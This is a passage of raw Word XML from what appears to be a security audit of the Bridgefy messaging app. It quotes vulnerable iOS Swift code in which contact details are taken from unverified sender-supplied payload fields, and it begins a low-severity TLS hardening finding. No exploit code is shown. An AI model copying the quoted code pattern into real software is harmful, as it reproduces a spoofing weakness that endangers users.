          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1115" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="66"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(iOS):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-ios/Bridgefy/MessageManager/MessageManager.swift</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(iOS):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="0" w:right="1251" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>private func insertBroadcastMessage(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: MessageBroadcastPayload) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="132" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>let contact = ContactModel.fetch(withID: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.payload.senderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="2408" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>config.context),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="1907" w:right="5637" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>contact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.isBlocked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1511" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.context.performChanges </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="1907" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>MessageBroadcastModel.save(fromMessage: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>message,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="31"/>
        <w:ind w:left="1907" w:right="2112" w:firstLine="2672"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>context:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.config.context</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>) let contact = Contact(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>id: message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.payload.senderId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="4084" w:right="1544" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>displayName: message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.payload.senderName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>nickname: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.payload.senderNickname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="4084" w:right="363" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>avatar:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>String(message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.payload.senderAvatar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, isBlocked: false)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="81"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="1"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to extrapolate the mitigation guidance offered under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:u w:val="single" w:color="1154CC"/>
        </w:rPr>
        <w:t>BFY-01-014</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to resolve this issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="320"/>
        <w:rPr>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250037" w:id="18"/>
      <w:r>
        <w:rPr>
          <w:color w:val="002F7B"/>
        </w:rPr>
        <w:t>Hardening </w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:color w:val="002F7B"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="353"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This area of the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>provides</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>insight</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>less</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>significant</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>weaknesses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>might</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>assist adversaries in certain situations. Issues listed in this section often require another vulnerability to be exploited, need an uncommon level of access, exhibit minor risk potential on their own, and/or fail to follow information security best practices. Nevertheless, it is recommended to resolve as many of these items as possible to improve the overall security posture and protect users in edge-case scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_TOC_250036" w:id="19"/>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>BFY-01-001</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>WP2/3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Hardening</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
        </w:rPr>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="37751C"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Low</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="45818E"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It was found that the TLS configuration of several Bridgefy servers has a number of minor weaknesses that could be improved. While these issues do not constitute any significant security finding at present, they might become serious as new attacks continue to be discovered and fall into the public domain. Furthermore, these misconfigurations may facilitate Man-In-The-Middle attacks against outdated clients. Please note that many more servers are likely affected by this issue, only the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>below</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is provided for brevity purposes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Many</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>configurations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>several</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:w w:val="150"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>shortcomings:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Support</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
